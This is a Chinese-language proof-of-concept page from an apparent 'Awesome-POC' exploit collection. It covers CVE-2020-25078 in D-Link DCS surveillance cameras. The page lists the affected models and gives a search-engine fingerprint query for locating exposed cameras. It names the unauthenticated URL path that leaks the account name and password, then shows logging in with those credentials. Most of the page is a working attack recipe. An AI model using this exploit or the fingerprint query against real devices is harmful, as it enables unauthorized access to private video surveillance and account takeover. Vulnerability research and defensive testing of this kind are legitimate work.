Awesome-POC/网络设备漏洞/D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078.md
2024-11-06 14:10:36 +08:00

48 lines
690 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# D-Link DCS系列监控 账号密码信息泄露漏洞 CVE-2020-25078
## 漏洞描述
D-Link DCS系列监控 通过访问特定的URL得到账号密码信息攻击者通过漏洞进入后台可以获取视频监控页面
## 漏洞影响
```
DCS-2530L
DCS-2670L
DCS-4603
DCS-4622
DCS-4701E
DCS-4703E
DCS-4705E
DCS-4802E
DCS-P703
```
## 网络测绘
```
app="D_Link-DCS-2530L"
```
## 漏洞复现
访问登录页面如下
![](images/202202162226738.png)
出现漏洞的 Url 为, 其中泄露了账号密码
```plain
http://xxx.xxx.xxx.xxx/config/getuser?index=0
```
![](images/202202162227778.png)
使用泄露的账号密码登陆系统
![](images/202202162227388.png)